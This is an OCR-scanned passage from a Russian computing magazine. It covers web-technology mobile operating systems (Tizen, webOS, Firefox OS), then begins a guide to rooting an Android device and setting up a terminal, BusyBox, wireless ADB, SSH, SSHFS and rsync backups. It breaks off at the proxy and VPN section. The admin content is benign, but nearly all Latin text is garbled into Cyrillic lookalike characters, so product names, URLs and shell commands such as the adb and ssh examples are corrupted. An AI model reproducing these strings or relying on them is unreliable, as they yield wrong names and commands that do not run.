ванных на процессоре Іпіеі Аіот. В июле 2012 
года финская компания ОоІІа МоЬіІе, основанная 
бывшими сотрудниками Мокіа, участвовавшими 
в разработке Меебо, сообщила о начале работ над 
смартфоном, который будет базироваться на Мег. 
Его выпуск запланирован на конец 2012 года. 



ТІ2ЕМ 



После отказа Мокіа от работы над Меебо Іпіеі объ- 
единилась с компанией баппзипд, организацией 
Еіпих РоипсІаОоп и проектом ЕіМо для создания 
совершенно новой ОС ТІ 2 еп. Она спроектирована 
на базовых компонентах Меебо и предлагает 
новый подход к разработке приложений, основан- 
ный на технологиях НТМЕ5 и ^аѵа5сгірЕ 

Как и ѴѴеЬОб, о которой мы поговорим 
в следующем разделе, идея Тігеп заключается 
в том, чтобы использовать стек технологий Еіпих 
в паре с графическим интерфейсом, полностью 
основанным на веб-технологиях, таких как НТМЕ, 
^аѵа5сгір^ и С55. Главным аргументом в пользу 
такой архитектуры здесь служит простота пере- 
носа и создания приложений. Веб-технологии 
изначально разрабатывались с упором на под- 
держку самых разных типов экранов и устройств, 
поэтому приложения будут легко и в большин- 
стве случаев автоматически адаптироваться 
под разные устройства, будь то смартфон или 
умный телевизор. Кроме того, приложения, 
написанные с использованием веб-технологий, 
просты в реализации и не требуют специального 
обучения программистов: кроме АРІ к операцион- 
ной системе, все остальные компоненты знакомы 
большинству программистов. 

Помимо основного веб-стека для создания 
приложений, в ТІ 2 еп предусмотрен также Маііѵе 
Оеѵеіортепі КіЕ позволяющий писать части 
приложений на низкоуровневых языках типа С 
и С++, что необходимо для создания игр и других 
высокопроизводительных приложений. При этом 
для 99% обычных приложений производитель- 
ности ^аѵа5сгір^ будет достаточно, так как наибо- 
лее трудоемкие операции (проигрывание видео, 
музыки, шифрование и так далее) будут вы- 
полняться библиотеками, входящими в базовый 
комплект ОС и написанными на тех же С/С++. 

Первый публичный релиз ТІ 2 еп состоялся 
в мае 2012 года, когда разработчики выложили 
в сеть исходные тексты первой версии операци- 



ЦУКЕРБЕРГ НЕ ПОЗВОНИТ 



НТМЕ5 на время очаровал не только «лузеров» мобильного рынка, но и разработчиков популяр- 
ных приложений для доминирующих платформ, включая РасеЬоок и Тѵѵіиег. С их точки зрения, 
веб-технологии были удачны тем, что позволяли создавать кроссплатформенные приложения 
и обновлять клиенты для разных ОС синхронно. Как оказалось, это вышло им боком — по срав- 
нению с нативными разработками получались медленные, малофункциональные и неудобные 
программы. Основатель социальной сети РасеЬоок Марк Цукерберг публично заявил, что ставка 
на НТМЕ5 стала «самой крупной ошибкой» знаменитого сервиса, и пообещал выпустить натив- 
ные версии мобильных клиентов. 

Определенно, связывать НТМЕ5 с тем, что стоимость РасеЬоок как компании упала почти 
вдвое с момента ІРО, — довольно слабый ход для главы гигантской интернет-махины. С тем 
же успехом катастрофическое падение акций можно было бы объяснить неверной конфигура- 
цией веб-серверов или неудачным решением для хранения баз данных. Но от этого проблемы 
НТМЕ5 не перестают быть реальными. Как пояснил в своем блоге Джо Хьюит, глава разработки 
і05-версии клиента РасеЬоок, на данном этапе веб-технологии просто не могут сравниться с 
нативными платформами по темпам развития. Без сомнения, НТМЕ и компания остаются при- 
влекательным решением в силу своей универсальности и кроссплатформенности, но до тех пор, 
пока не существует единого административного органа, курирующего развитие веба, примене- 
ние таких решений за пределами браузера будет оставаться утопией. 
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Планшетный интерфейс ѵѵеЬОЗ 

онной системы, 50К на базе Есіірзе, эмулятор, 
основанный на ОЕМІІ, а также специальный 
инструмент для быстрого тестирования приложе- 
ний, работающий прямо в браузере и эмулирую- 
щий Тігеп АРІ. Интересно при этом, что абсо- 
лютно все стандартные приложения, входящие 
в базовый состав ОС, были написаны вовсе 
не на ^аѵа5спр^/НТМ^5, а являлись стандартны- 
ми Ыпих-приложениями, графический интерфейс 
которых формировался с помощью библиотек 
ЕРЕ (ЕпІідЫептепІ Роипбабоп ЕіЬгагіез), рабо- 
тающих поверх стандартного для «настольных» 
Еіпих-дистрибутивов Х-сервера. 

Остальные компоненты ОС фактически по- 
вторяли базовый набор компонентов МееОо, 
включая различные сервисы, такие как кон- 
фигуратор беспроводных сетей СоппМап, 
ВІиеІооіЬ-стек Ыие 2 , мультимедиафреймворк 
бзігеатег, набор кодеков РРтред, библиотека 
0реп55Е, а также веб-стек на базе браузерного 
движка ѴѴеЬКіІ и библиотеки ^^иегу МоЬіІе 1.0. 

Как и МееОо, ТІ 2 еп рассчитана на примене- 
ние во множестве различных типов устройств. 



однако на данный момент был полностью закон- 
чен только графический интерфейс для смарт- 
фонов и других подобных устройств с портретной 
ориентацией экрана. Сама графическая обо- 
лочка не обладает какими-то интересными нов- 
шествами, являя собой достаточно стандартный 
рабочий стол, сильно напоминающий АпбгоісІ 
с модификацией ТоисЬѴѴІ 2 (сразу видно влияние 
компании Заппзипд и проекта ЕіМо, в разработке 
которого она активно участвовала). 

В сентябре стала доступна версия 2.0 опера- 
ционной системы, которая, несмотря на значи- 
тельной прыжок в номере версии, не принесла 
кардинальных изменений, за исключением 
расширенного АРІ, более полной поддерки стан- 
дартов НТМЕ5/ѴѴЗС (стоит заметить, что ТІ 2 еп 
ѴѴеЬ АРІ большей частью состоит из стандар- 
тов, предложенных ѴѴЗС, включая ѴѴеЬРТС, 
деШзегМесІіа АРІ, ѴіЬгаІіоп АРІ и так далее) 
и перехода на движок ѴѴеЬКіі2, благодаря чему 
удалось обеспечить более надежную изоляцию 
веб-приложений друг от друга. 

Отдельно стоит отметить, что благодаря 
гибкой архитектуре ТІ 2 еп позволяет достаточно 
легко «прикрутить» к себе практически любую 
графическую оболочку. Например, еще с выходом 
первой версии ОС компания ОрепМоЫІе подгото- 
вила слой совместимости Арріісаііоп СотраІіЫІіІу 
Еауег, позволяющий запускать в ТІ 2 еп приложе- 
ния, написанные для АпбгоісІ (справедливости 
ради надо сказать, что тот же продукт доступен 
и для операционных систем МееОо и ѵѵеЬОО). 

Если же говорить об устройствах, то они 
ожидаются уже в конце 2012 года, причем 
о своих планах сделать аппараты на базе новой 
ОС заявили не какие-то экзотические азиат- 
ские бренды, а такие мастодонты, как НТС, Асег 
и А5ЕІ5. Скорее всего, это будут штучные модели 
для проверки того, «как пойдет», но сам интерес 
таких компаний к полностью открытой ОС, кото- 
рая гораздо больше похожа на массовый Еіпих, 
чем АпсІгоісІ, не может не радовать. 



ѴѴЕВ05 



Говоря об операционных системах, основа- 
ных на веб-технологиях, нельзя не упомянуть 
о ѵѵеЬОЗ — фактически это первая ОС такой 
архитектуры, снискавшая достаточную популяр- 
ность. ѴѴеЬОР была разработана и анонсирована 
в январе 2009 года компанией Раіт, которая ис- 
пользовала ее в мобильном телефоне РаІт Рге, 
выпущенном на рынок спустя полгода, а также 
в смартфонах Раіт Ріхі и Рге2. 

Компания Раіт возлагала большие надежды 
на ѵѵеЬОЗ, намереваясь использовать ее для вос- 
становления своих почти полностью утраченных 
позиций на рынке карманных компьютеров 
и смартфонов. Однако, несмотря на высокое 
качество и возможности операционной системы, 
устройства на базе ѵѵеЬОЗ так и не завоевали 
большой любви у пользователей; в результате 
компания была продана, и новым владельцем 
ее в апреле 2010 года стала НеѵѵІеи-РаскагсІ. 
Представители гиганта ІТ-индустрии прямо 
заявили, что причиной их приобретения стала 
именно ѵѵеЬОЗ, на базе которой НР планировала 
производить смартфоны, планшеты и принтеры. 

НР использовала ѵѵеЬОЗ для выпуска таких 
устройств, как НР Ѵеег и НР Рге 3, планшета 
НР ТоисЬРасІ, а также планировала выпустить 
специальный порт ОС для ѴѴіпсІоѵѵз, который 
должен был быть установлен на все компы и но- 
утбуки производства компании, выпущенные 
в 2012 году. Тем не менее смартфоны и планшет 
ТоисЬРасІ провалились на рынке, а последняя 
задумка так и не была реализована. Все это 
привело к тому, что после недолгих метаний 
руководства компании между различными 
идеями, как использовать ѵѵеЬОВ, и снижения 
цен на устройства НР объявила в декабре 201 1 
года о планах открыть исходные тексты опера- 
ционной системы и передать их независимому 
сообществу. Уже в январе был выложен в от- 
крытый доступ код фреймворка Епуо, использу- 
емого для разработки ѵѵеЬОВ-приложений, тогда 
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Интерфейс РігеТох 05 



как полностью открыли ѵѵеЬОЗ только в конце 
сентября нынешнего года. 

ѴѴеЬОЗ — это третья (и не последняя) 
операционная система в нашем обзоре, почти 
полностью основанная на технологиях Ыпих. 
Однако отличия есть. Два предыдущих проекта 
больше похожи на сборную солянку из раз- 
личных технологий, да еще и приготовленную 
по рецепту, который писался во время самого 
приготовления. ѴѴеЬОЗ уже с первой версии 
была полностью законченной и тщательно от- 
полированной ОС, где все находится на своих 
местах и удивительно четко организовано. 

В основе ѵѵеЬОЗ лежит окружение Ыпих, 
со всеми сопутствующими технологиями, фрейм- 
ворками и наборами открытых библиотек, боль- 
шинство из которых пересекаются с проектами 
МееОо и ТІ 2 еп (код всего этого стека компания 
Раіт добросовестно открыла одновременно 
с анонсом ОС), поэтому в данном обзоре они 
не представляют особого интереса и я опущу 
их описание. Гораздо более интересная часть 
ѵѵеЬОЗ — это тот самый фреймворк Епуо. 

Фактически Епуо ( епуо]5.сопп ) представляет 
собой ^аѵа5сгір^библиотеку, функциональность 
которой используется для написания ѵѵеЬОЗ- 
приложений и формирования их графического 
интерфейса. Программа, написанная с помо- 
щью Епуо, мало чем отличается от обычного 
веб-приложения: разработчик подготавливает 
НТМЕ-каркас, а затем использует ^аѵа5спр^ 
и Епуо для создания на его базе графического 
интерфейса. При этом в распоряжении про- 
граммиста не только базовый АРІ, но и набор 
системных функций для доступа к операцион- 
ной системе, вызовы которых преобразуются 
в сообщения О-Виз, что позволяет из коробки 
сделать их асинхронными и реализовать аудит 
для проверки полномочий приложений. 

ѴѴеЬОВ изначально была полностью основана 
на Епуо. По сути, после загрузки ОС происходит 
запуск движка ѴѴеЬКіІ и весь интерфейс опера- 
ционной системы формируется с помощью НТМЕ 
и С55 (включая интерфейс встроенного браузе- 
ра), что тем не менее не мешает программистам 
писать приложения на классических С и С++, 
используя специальные обертки для вывода 



графики. Пользователю при этом доступен стан- 
дартный набор инструментов среды Ыпих: ззЬ, 
ср, ѵі, дгер, ЛпсІ, сІіН, Іор, \аг, д 2 Ір и так далее. 

ѴѴеЬОВ обладает приятным графическим 
интерфейсом, построенным на основе идеи 
сменяемых карточек, отличной производи- 
тельностью и проработанностью, и она вполне 
могла бы занять лидирующие позиции на рынке 
мобильных ОС, если бы не компания Ооодіе с ее 
агрессивными методами продвижения АпсІгоісІ 
и изначальная идея РаІт не лицензировать опе- 
рационную систему сторонним производителям. 



РІРЕР0Х05 



Бум интереса к использованию веб-технологий 
для создания обычных приложений никак не мог 
пройти мимо компаний, чей бизнес напрямую 
зависит от этих самых технологий. Еще в 2009 
году боодіе открыла исходные тексты облачной 
операционной системы СЬготе 05 (СЬготіит 
05), особенность которой заключалась в исполь- 
зовании модифицированной версии браузера 



Ооодіе СЬготе в качестве рабочего стола опера- 
ционки, где все приложения находятся в обла- 
ках (бтаіі, УоиТиЬе, ЕазЕі'пп и так далее). В июле 
2011 года компания Мо 2 ІІІа объявила о начале 
работ над мобильной операционной системой 
Вооі Іо Веско (В26), основанной на ядре Ыпих 
и движке рендеринга веб-страниц Веско. Ровно 
через год операционная система получила более 
благозвучное и удачное с коммерческой точки 
зрения имя РігеІ'ох 05. 

По своей сути и назначению РігеЬх 05 ока- 
залась очень похожей на ТІ 2 еп и ѵѵеЬ05: все то 
же базовое окружение Ыпих, движок рендеринга 
веб-страниц, ^аѵа5спр^движок и специальная 



^5-библиотека. При этом разработчики Мо 2 ІІІа 
не стали изобретать велосипед и взяли за основу 
ОС базовое окружение АпсІгоісІ, со всеми его би- 
блиотеками, сервисами, ІРС-интерфейсом Віпсіег, 
30-драйверами, мультимедиафреймворком и про- 
чими вкусностями. Поверх этого окружения был 
водружен движок Веско и создан графический ин- 
терфейс Ваіа, полностью базирующийся на НТМЕ, 
С55 и открытых веб-стандартах, принятых ѴѴЗС. 

Интересно в РігеІ'ох 05 то, что здесь фак- 
тически нет каких-то заново изобретенных 
АРІ для доступа к оборудованию. Почти весь 
базовый АРІ для разработки приложений осно- 
вывается на открытых стандартах, что позволяет 
практически без изменений переносить целые 
веб-приложения в РігеІ'ох 05, а также выполнять 
обратный перенос и тестирование приложений 
прямо в настольном браузере. Вторая важная 
особенность ОС заключается в том, что раз- 
работчики приняли решение использовать почти 
неизмененное окружение АпсІгоісІ в качестве 
базы ОС, благодаря чему перенос операционной 
системы на другие устройства (работающие под 
управлением АпсІгоісІ) превращается в тривиаль- 
ную задачу, с которой может справиться даже 
минимально технически подкованный человек. 

Уже сейчас официальные сборки Ріге^ох 05 
подготовлены для таких платформ/устройств, 
как Оіого, РапбаВоагсІ, Етиіаіог (АРМ и х86), 
Оезкіор, Мехиз 5, Мехиз 5 46, Ваппзипд баіаху 
5 II и баіаху Мехиз. Кроме того, энтузиастами 
были созданы порты ОС также и на множество 
других устройств, включая даже такой малорас- 
пространенный АпсІгоісІ-смартфон, как Моіогоіа 
Оеі^у. о своих планах использовать Рігеі'ох 05 
уже заявили испанский оператор сотовой связи 
Теіеі'опіса, компания 2ТЕ и некоторые другие. 

Если же говорить об интерфейсе ОС, то здесь 
все достаточно стандартно и ничего нового 
РігеІ'ох 05 не преподносит: обычный интерфейс, 
в очередной раз похожий на АпсІгоісІ и, местами. 



ѵѵеЬ05 и ѴѴіпбоѵѵз РЬопе, оформленный следуя 
современным традициям минимализма и выпол- 
ненный в виде журнальных страниц интерфейсов. 



выводы, или кто БУДЕТ жить 



«Финт ушами» в исполнении фанатов веб- 
технологий на данный момент выглядит 
не слишком убедительно. Какая из этих мобиль- 
ных ОС выживет, покажет время, но скорее 
всего каждая из них займет небольшой процент 
мобильного рынка и будет использоваться 
на маломощных устройствах, выпускаемых 
различными компаниями. И это еще самый 
оптимистичный прогноз. ^ 



ФАКТИЧЕСКИ В РІВЕРОХ 05 НЕТ КАКИХ-ТО 
ЗАНОВО ИЗОБРЕТЕННЫХ АРІ ДЛЯ ДОСТУПА 
К ОБОРУДОВАНИЮ 
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Х-МОВІЬЕ 



Максим Полевой (такз.НаІсНеІйуапсІех.ги) 



НАЧАЛО 

БОЛЬШОГО 




ОСНАЩАЕМ АНОКОЮ 
ВСЕМ НЕОБХОДИМЫМ 
ДЛЯ УДОБНОЙ 
И ПРОДУКТИВНОЙ РАБОТЫ 

С какой стороны ни посмотри, АпсІгоісІ — операционная система 
для рядовых пользователей, интерфейс и базовые возможнос- 
ти которой разрабатывались с учетом потребностей человека, 
абсолютно незнакомого стойкостями работы компов, планше- 
тов и смартфонов. Тем не менее, приложив немного усилий, ее 
легко адаптировать под свои нужды и превратить в серьезный 
рабочий инструмент. 



ВВЕДЕНИЕ 



В этой статье я расскажу о том, как сделать 
из АпсІгоісІ инструмент матерого ІТ-шника — 
инструмент, включающий в себя весь набор 
необходимых программ, которые только могут 
понадобиться в жизни. Перво-наперво мы 
превратим наш смартфон (или планшет, кому 
как больше нравится) в нормальную Ыпих- 
систему, получив гооі на девайсе, установив 
эмулятор терминала и пакеты утилит команд- 
ной строки. Затем мы обзаведемся всеми 



необходимыми инструментами для удален- 
ной работы, включая клиент и сервер 55Н, 
утилиту гзупс и демон удаленного управления 
АОВ, не требующий подключения устройства 
с помощью кабеля. Само собой, мы не сможем 
обойтись без прокси, а также ѴРМ-клиентов, 
они тоже войдут в наш джентльменский набор. 
Последним шагом станет написание загру- 
зочных скриптов для выполнения различных 
полезных для нас действий во время загрузки 
смартфона/планшета. 



РУТИНГ, ТЕРМИНАЛ И НАБОР I 
УТИЛИТ КОМАНДНОЙ СТРОКИ 



Получить права суперпользователя на девай- 
се — это первое, что мы должны сделать, чтобы 
превратить устройство из красочной игрушки 
с няшными иконками и стильными кнопочками 
в настоящий карманный компьютер. Без прав 
гооі 80% описанного ниже будет бессмыслен- 
но, так как система просто не позволит себя 
кастомизировать и установить низкоуровневые 
инструменты вроде ВизуВох или 55Н. 

К сожалению, методы рутинга девайсов 
очень сильно отличаются от одной модели 
кдругой, поэтому универсального решения 
тут нет. Ты можешь попробовать воспользо- 
ваться такими программами, как ЗирегОпеСІіск 
( 5Ьогиц5е.огд/?раае ісІ=2 ]. но не факт, что она 
сработает для твоего девайса. Поэтому лучший 
способ зарутить робот — это найти инструкцию 
в Сети по гуглозапросу «#устройство# гооЬ>, 
тем более что многие производители позволя- 
ют разлочить загрузчик с помощью специаль- 
ного сервиса (с потерей гарантии, разумеется), 
после чего остается только прошить уже 
рутованную прошивку. 

Когда рутинг будет выполнен, у тебя по- 
явится возможность установить на смартфон 
все необходимые утилиты, включая ВизуВох 
и МібпідЫ Соттапсіег. Но для начала лучше 
обзавестись эмулятором терминала. В Мар- 
кете его можно найти по названию «АпсІгоісІ 
ТегтіпаІ Епгшіаіог». В дополнение к нему также 
рекомендую установить полную клавиату- 
ру «Наскег'з КеуЬоагсІ», которая включает 
в себя не только буквы и отдельные символы, 
но и клавиши управления курсором, клавиши 
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Запускаем АОВ в сетевом режиме 



<Р1> — <Р12>, <СігІ> и так далее — все, что 
потребуется при работе в терминале и наборе 
команд. Владельцы планшетов обязатель- 
но должны опробовать терминал АігТегт, 
который запускается в отдельном плавающем 
окне. Он платный (-120 рублей), но чрезвычай- 
но удобный. 

Послетого кактерминал будет установ- 
лен, можно приступить к установке пакета 
стандартных Ыпих-утилит командной строки. 
В АпбгоісІ уже есть собственный набор таких 
утилит, но он очень скуден и не включает 
в себя некоторые наиболее полезные тулзы 
(например, утилиту Іор, показывающую самые 
прожорливые процессы). Поэтому мы устано- 
вим пакет ВизуВох, включающий в себя около 
двухсот различных утилит. В боодіе РІау он 
называется так же. После установки просто 
запусти приложение, дождись окончания про- 
верки на права гооі и нажми кнопку «ІпзІаІІ» 
внизу экрана. 

Также тебе наверняка понадобится 
консольный файловый менеджер МібпідЫ 
Соттапсіег, который, конечно, будет беспо- 
лезен на самом устройстве, но может сильно 
пригодиться при подключении к смартфону/ 
таблетке с помощью 55Н или АОВ. Установить 
МС можно через боодіе РІау, но там он стоит 
денег (30 рублей), поэтому проще скачать 
инсталлятор с ХОА: доо.дІ/пРрІ'а . Достаточно 
установить, запустить приложение и нажать 
кнопку «ІпзІаІІ». 



55Н,АРВ0ѴЕКѴѴІ-РІ 



Для эффективной работы с устройством нам 
не обойтись без инструмента удаленной 



ѵАш 19:21 



ДИ 0 

ѴѴвІсотѳ со ВизуЬохІ 

Зсагсіпа Зипсіау Аидигс ЗОсЬ, ВигуЬох 
Рго ѵѵіІІ Бѳ оп гаіе ?ог $1.80 [гед $4.99] !ог 
в 8^ю^с атоопс о! сіпгіѳ. Ьиггу Ье^оге сЬѳ 
заіе епсіеі 

Мѳѵѵ ^васигев ^ог ВизуВох Рго! 

Меѵѵ Васкир Гѳасиге ^ог за^ег іпвсаііз апсі 
^ог Ьѳссег апсі за^ѳг ипіпзсаіізі 

Мѳѵѵ ^еасиге со аііоѵѵ сЬе іпзсаііасіоп оГ апу 
ѵѳгБіоп о( ВизуЬохІ 

РазСег ІоасІіпд сітез. 

АЫІІСу со аисотасіс^ІІу ирсіасе ЬизуЬох. 

АЬіІІСу со іпзсаІІ зресіПс арріесз опз Ьу опѳ 
апсІ споозіпд Ьоѵѵ сЬѳу аге іпзсаііесі. 

ТЬе рго ѵѳгзіоп о? сЬіз арріісасюп сап Ье 
^оипсі Ьѳгѳ; ЬссрзУ/гттагке г : апсігоісі сопѴ 
Ьесаі!8?ісі«8Сегіс9ог. ЬизѵЬбх сіопасѳ 




Устанавливаем ВизуВох 



отладки АОВ (АпсІгоісІ ОеЬид Вгісіде), кото- 
рый поставляется в комплекте с АпсІгоісІ 
50К и позволяет выполнять такие дей- 
ствия, как копирование файлов на девайс, 
установка приложений, получение доступа 
к консоли с обычного компа. Проблема лишь 
в том, что по умолчанию АпсІгоісІ позволяет 
использовать АОВ только при подключении 
устройства с помощью 05В-кабеля, а это, 
как сам понимаешь, не очень удобно. Чтобы 
получить возможность доступа к АпсІгоісІ 
через АОВ по беспроводной сети, нам пона- 
добится простое АпбгоісІ-приложение ѴѴіРі 
АОВ, которое позволит запустить АОВ-сервер 
в сетевом режиме (он это умеет по умолчанию, 
однако в целях безопасности стоковые про- 
шивки не позволяют использовать АОВ таким 
образом). 

Теперь, чтобы подключиться к АпсІгоісІ 
с помощью АОВ, достаточно запустить 
установленное приложение, нажать кнопку 
«Тигп Оп», далее на компе перейти в каталог 
с установленным АпсІгоісІ 50К, затем в каталог 
ріаиогт-іооіз и запустить выведенную при- 
ложением на экран команду. Например (в моем 
случае): 

$ асІЬ соппесі; 192.168.0.102:5555 

В результате на экране появится такая 
строка: соппесіесі Іо 192.168.0.102:5555. 

Далее можно выполнять различные удален- 
ные действия. Например, получить доступ 
к терминалу и, как следствие, всем уста- 
новленным ранее вкусностям, типа набора 
Ыпих-утилит и МС: 



% асІЬ 5Ііе11 

Или установить/удалить приложение: 

$ асІЬ іп5І:а11 пакет. арк 

$ асІЬ ипіп5І:а11 имя. пакета 

Установить рекурсивно все приложения в те- 
кущем каталоге (из Ыпих): 

$ -Рог арк іп *.арк; сіо асІЬ іп5І:а11 $арк: <-■ 
сіопе 



Скопировать файлы на карту памяти девайса 
или с карты памяти: 

$ асІЬ ризЬ каталог /зсісагсі 
$ асІЬ /зсісагсі/каталог каталог 

Атакже просмотреть системный лог: 

$ асІЬ 1о§са1: 

Использовать АОВ для удаленного управ- 
ления устройством очень удобно, однако 
у этого способа коммуникации есть два суще- 
ственных недостатка: медленная скорость пе- 
редачи данных и абсолютная незащищенность 
(к устройству может подключиться любой). 
Поэтому, если ты хочешь манипулировать де- 
вайсом не дома или тебе нужна действительно 
хорошая скорость работы, лучше использовать 
старый добрый 55Н. 

Для АпсІгоісІ есть несколько различных 
реализаций 55Н-серверов, кактребующих 
права гоо\, так и способных работать без них 
(в том числе встроенный 55Н-сервер в про- 
шивку СуаподепМосІ), но я бы порекомендовал 
остановиться на ВВНОгоісІ как наиболее удоб- 
ном, простом в использовании и ктомуже бес- 
платном. Просто установи его на устройство, 
запусти, нажми кнопку «5Ыг1» в верхней части 
экрана и вбей в 55Н-клиент адрес, показан- 
ный в строке «Асісігезз:» (опустив непонятно 
зачем написанный префикс зйр://). Или вос- 
пользуйся консольным 55Н-клиентом: 

$ 55Ь гоо1:@192.168.0.2 

Это может показаться смешным, 
но по умолчанию 55Н0гоісІ использует 
пароль абтіп, который выводится в при- 
ветственном баннере перед строкой ввода 
пароля. Само собой, такую дикость можно 
исправить в настройках, вбив нормальный 
пароль в поле «РаззѵѵогсІ» и сняв галочку 
с опции Іодіп Ьаппег. Также очень легко 
настроить авторизацию по ключам, просто 
сгенерировав Р5А-ключ на компе (пример 
для *піх-системы): 

$ ѵез I 55Іі-кеѵ^еп 

а затем скопировав файл ~/.55Ь/ісІ_г5а. 
риЬ на карту памяти девайса и добавив 
его в 55Н0гоісІ с помощью опции АиіЬогігесІ 
кеуз (достаточно просто выбрать нужный 
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файл и дать ключу имя), после чего опцию 
ЕпаЫе раззѵѵогсі можно отключить и спо- 
койно ходить на девайс без пароля. Чтобы 
выполнить обратное подключение, то есть 
с устройства к компу, можно использовать 
проверенный временем клиент СоппесіВоЕ 
Пользоваться им еще проще. После запуска 
просто вбиваем имя_юзераЙІР в окно ввода 
внизу экрана и нажимаем «Готово». После 
этого клиент спросит пароль и откроет окно 
эмулятора терминала. 

Чтобы не вводить пароль для входа 
на удаленную систему, СоппесіВоІ позволяет 
сгенерировать открытый ключ. Для этого на- 
жимаем кнопку «Меню», далее «Управление 
открытыми ключами», снова «Меню» и «Ге- 
нерировать». Откроется экран, где следует 
указать имя ключа («Псевдоним») и ввести 
пароль для доступа к нему (остальные поля 
можно не трогать, 1024-битного Р5А-ключа бу- 
дет вполне достаточно), а затем нажать кнопку 
«Генерировать». Далее приложение вернет 
тебя к списку ключей, удерживаем долгий тап 
на нужном нам и в открывшемся меню нажима- 
ем «Копировать публичный ключ». СоппесіВоІ 
не поддерживает запись ключа во внешний 
файл, поэтому ключ будет скопирован в буфер 
обмена, после чего его можно будет вставить, 
например, в письмо и отправить самому себе, 
а затем добавить в файл ~/.55Ь/аиіЬогІ2есІ_кеу5 
в ІІМІХ/Ыпих или с помощью графического 
интерфейса 55Н-сервера для ѴѴіпсІоѵѵз или 
Мае 05. 



В принципе, всего этого уже будет вполне 
достаточно для управления как домашней ма- 
шиной с устройства, так и самим устройством. 
Однако в Ооодіе РІау есть еще несколько 
интересных приложений, использующих 
протокол 55Н. В первую очередь я хотел бы 
обратить внимание на 55НР5АпсІгоісІ — плат- 
ное (80 рублей), но действительно полезное 
приложение, которое позволяет монтировать 
удаленные ФС по протоколу 55Н. Фактиче- 
ски это просто обертка вокруг известной 
файловой системы пространства пользо- 
вателя ззМ'з, использующей модуль Ыпих- 
ядра РІІ5Е (включен во все стоковые ядра, 
начиная с АпбгоісІ версии 2.2; с помощью 
РІІ5Е в АпсІгоіеІ монтируются зашифрованные 
данные установленных на карту памяти при- 
ложений). 

Пользоваться 55НР5АпсІгоісІ довольно 
просто. После запуска главное окно приложе- 
ния будет пусто, за исключением кнопок «+» 
и «Настройки» в верхней части окна. Чтобы 
подключить новую ФС, нажми кнопку «+» 
и последовательно заполни все поля выведен- 
ного на экран меню: «Мате» — произвольное 
имя, «Нозі» — ІР или имя хоста (например, 
192.168.0.100), «Ретоіе раіЬ» — путь до ката- 
лога на удаленной стороне (например, /Ьоте/ 
ѵазуа), «Моипі роіпі» — точка монтирования 
(/збсагсІ/зЬаге), «СІзегпаппе» — имя юзера 
и «РаззѵѵогсІ» — пароль соответственно. Далее 
нажимаем кнопку «Сохранить» (пиктограмма 
в виде дискеты) и, вернувшись на главный 
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экран, просто кликаем на пункте с именем 
соединения. После запроса прав файловая 
система будет смонтирована к указанному 
каталогу. 

Все это работает так, как следует, но будь 
готов к тому, что приложения вроде музыкаль- 
ного плеера или галереи не смогут проиндек- 
сировать файлы на виртуальной ФС. Однако 
их вполне можно просмотреть и прослушать 
с помощью того же файлового менеджера 
или плеера, позволяющего проигрывать вы- 
бранные файлы на карте памяти. Интересно, 
что приложение поддерживает все опции 
ззЫ^з, которыми можно управлять в меню 
«АбѵапсесІ орііопз» при создании новой вирту- 
альной ФС. Там же можно настроить аутенти- 
фикацию по ключу. 



БЭКАП 



Для АпбгоісІ было разработано множество раз- 
личных решений для выполнения удаленного 
бэкапа, которые могут использовать в каче- 
стве хранилища различные облачные сервисы 
(например, ОгорЬох, Соодіе Огіѵе), а также 
серверы для ѴѴіпсІоѵѵз и Мае 05 X. Кому-то 
эти приложения могут оказаться удобными, 
однако каждый матерый ІТ-шник знает, что 
лучше гзупс для удаленного бэкапа пока еще 
не придумали. Пользователи СІМІХ-систем 
должны быть хорошо знакомы с этой утилитой, 
для остальных же поясню, что гзупс представ- 
ляет собой инструмент, который позволяет 
инкрементально синхронизировать локаль- 
ный каталог с удаленным по протоколу 55Н. 
Когда ты сделаешь бэкап с помощью гзупс, 
все последующие бэкапы будут происходить 
гораздо быстрее благодаря копированию 
только измененных частей существующих 
и новых файлов. 

Для выполнения бэкапа с помощью гзупс 
достаточно выполнить всего два условия. 
Установить на принимающую сторону (в 
нашем случае это будет домашний комп) 55Н- 
сервер, а на отдающую сам гзупс, в качестве 
которого в нашем случае будет выступать 
приложение «гзупс Ьаскир 1"ог АпсІгоіеІ» 
из репозитория Соодіе РІау. Далее следует 
запустить гзупс с определенными опциями 
и указать каталог для бэкапа (например, 
/збсагсі — содержимое карты памяти), все 
остальное он сделает сам. 

Итак, скачиваем и устанавливаем гзупс 
Ьаскир, видим голый экран, нажимаем кнопку 
«Меню» и выбираем пункт «беі Ыпагіез», 
чтобы скачать утилиту гзупс. Далее необхо- 
димо сгенерировать публичный и приватный 
ключи, что делается с помощью пункта меню 
«Сенегале кеуз». После окончания форми- 
рования ключей на экран будет выведено 
меню с предложением передать этот ключ 
с помощью одного из способов. Проще всего 
выбрать СптіаіІ и отправить ключ самому себе 
либо выложить его на ОгорЬох. Далее этот 
ключ необходимо записать в файл ~/.ззЬ/ 
аиіЬогІ 2 есІ_кеуз на принимающей стороне 
или добавить с помощью графического ин- 
терфейса, если речь идет о ѴѴіпсІоѵѵз и Мае 05. 
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Запускаем 55Н-сервер 



После этого вновь переходим в меню 
и создаем новый профиль, выбрав пункт «АбсІ 
ргоЛІе». В открывшемся меню последовательно 
заполняем поля: «Ргобіе пате» — имя профиля, 
«ІосаІ і\\е ог сіігесіогу» — синхронизируемый 
каталог (лучше указать /зсісагсі для бэкапа всей 
карты памяти), «ІІзегпате» — имя пользовате- 
ля на принимающей стороне, «Вегѵег» — ІР или 
имя сервера, «ОгорЬеаг 55Н ргіѵаіе кеу» — при- 
ватный ключ, сгенерированный в предыдущем 
шаге, он лежит по адресу /зсІсагсІ/сІ55_кеу, 
«Ретоіе і\\е ог сіігесіогу» — имя каталога 
на удаленной стороне (например, -/Ьаскир). 
Теперь нажимаем кнопку «5аѵе ргоЛІе», которая 
вернет нас на главный экран, где должен по- 
явиться наш профиль. Просто нажимаем на его 
имя, чтобы начать синхронизацию. 

Чтобы не запускать процесс бэкапа 
вручную, гзупс можно связать с приложением 
автоматизации Тазкег, о котором мы писали 
в предыдущем номере журнала. Тазкег позво- 
лит назначить синхронизацию на определен- 
ное время или другое событие, такое как об- 
наружение домашней беспроводной сети или 
подключение к зарядному устройству. 



ПРОКСИ и ѴРМ 



Теперь займемся настройкой прокси и ѴРМ. 

На мобильном устройстве их полезность может 
быть неочевидна. Однако существует большое 
количество ѴѴі-Рі-сетей, которые просто не пу- 
стят пользователя в обход прокси-сервера, 
а те сети, которые пустят, вполне могут монито- 
рить трафик на предмет паролей и конфиденци- 
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Эмулятор терминала 

альных данных, и, чтобы обойти эту проблему, 
